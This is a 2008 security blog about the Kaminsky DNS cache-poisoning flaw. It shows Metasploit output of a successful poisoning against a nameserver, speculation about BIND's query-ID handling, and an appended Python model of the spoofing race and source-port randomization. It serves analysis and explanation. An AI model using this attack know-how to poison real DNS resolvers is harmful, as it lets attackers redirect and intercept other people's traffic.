Wednesday, July 23, 2008


msf auxiliary(baliwicked_host) > exploit
[*] Targeting nameserver x.x.x.x for injection of as
[*] Querying recon nameserver for's nameservers...
[*] Got an NS record: 258801 IN NS
[*] Querying recon nameserver for address of
[*] Got an A record: 258801 IN A x.x.x.x
[*] Checking Authoritativeness: Querying x.x.x.x for
[*] is authoritative for, adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for into x.x.x.x:34649...
[*] Sent 1000 queries and 10000 spoofed responses...
[*] Sent 2000 queries and 20000 spoofed responses...
[*] Poisoning successful after 2250 attempts: ==
[*] Auxiliary module execution completed

$ nslookup.exe
Address: x.x.x.x

Non-authoritative answer:

Wednesday, July 16, 2008

Weighing in on the DNS thing...

My quick thoughts on the Kaminsky DNS thing, though I'm a little late to the party. Apparently it's a real thing. I spoke with someone who's lucky enough to be in the Magical Inner Circle of Truth and he agreed.

I have nothing but wild speculation here. I read through the BIND source a little, and I may be barking up the wrong tree, but it looks like the resolver doesn't randomize the QID for every query. Rather, it keeps a QID pool and checks for collisions before assigning an ID. Therefore, if you were to send a large number of queries to a bogus server where they will time out, you could effectively take those QIDs out of play. If this is a server you control, you are then able to drastically reduce the search space, since you know which QIDs you don't have to try.

Just a thought.
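As an added illustration (not code from this post or from BIND), a small Python model of the race that the transcript above shows: it assumes the resolver draws its 16-bit QID uniformly from whatever pool is still usable, that the forger sends a fixed number of distinct guesses per triggered query, and that each query is an independent trial. It lets you compare the fixed-port case from the transcript, the shrunken-pool case the post speculates about, and the source-port randomization that was rolled out as the fix.

```python
"""Probability model of a Kaminsky-style QID race (constructed example).

Assumptions, not measurements from the post:
- the resolver keeps one outstanding query per attacker-triggered lookup,
- the forger answers each query with `spoofs_per_query` forged replies, each
  carrying a distinct (qid, port) guess,
- a forged reply is accepted only if its QID and destination port match.
"""
from fractions import Fraction

QID_SPACE = 1 << 16  # 16-bit DNS transaction ID


def per_query_success(usable_qids: int, ports: int, spoofs_per_query: int) -> Fraction:
    """Probability that one burst of forged replies wins a single query.

    usable_qids: size of the QID pool the resolver actually draws from
                 (65536 if fully random; smaller if part of the pool is tied
                 up by queries that will only time out, as the post speculates).
    ports:       number of equiprobable UDP source ports (1 = fixed port).
    """
    search_space = usable_qids * ports
    # Guesses are distinct, so a burst covers spoofs/search_space of the space.
    return min(Fraction(spoofs_per_query, search_space), Fraction(1))


def expected_queries(usable_qids: int, ports: int, spoofs_per_query: int) -> float:
    """Mean number of triggered queries until the first forged reply wins
    (geometric distribution, mean 1/p)."""
    return float(1 / per_query_success(usable_qids, ports, spoofs_per_query))


def prob_success_within(queries: int, usable_qids: int, ports: int, spoofs_per_query: int) -> float:
    """Probability of at least one win within `queries` independent trials."""
    p = float(per_query_success(usable_qids, ports, spoofs_per_query))
    return 1.0 - (1.0 - p) ** queries


if __name__ == "__main__":
    # Transcript case: fixed port 34649, 10 forged replies per query, win at 2250.
    print("fixed port, full pool:     E[queries] = %.0f" % expected_queries(QID_SPACE, 1, 10))
    print("  P(win by query 2250)     = %.2f" % prob_success_within(2250, QID_SPACE, 1, 10))
    # The post's speculation: half the QID pool tied up by timed-out queries.
    print("fixed port, half the pool: E[queries] = %.0f" % expected_queries(QID_SPACE // 2, 1, 10))
    # Source-port randomization over ~64K ports, the deployed mitigation.
    print("random port, full pool:    E[queries] = %.0f" % expected_queries(QID_SPACE, 64000, 10))
```

With a fixed port the transcript's 2250 queries land at roughly a 29% chance of success, so the early win was luck rather than a smaller search space; randomizing the source port multiplies the expected effort by the number of ports, which is why that change, and not a tweak to QID selection alone, was the fix.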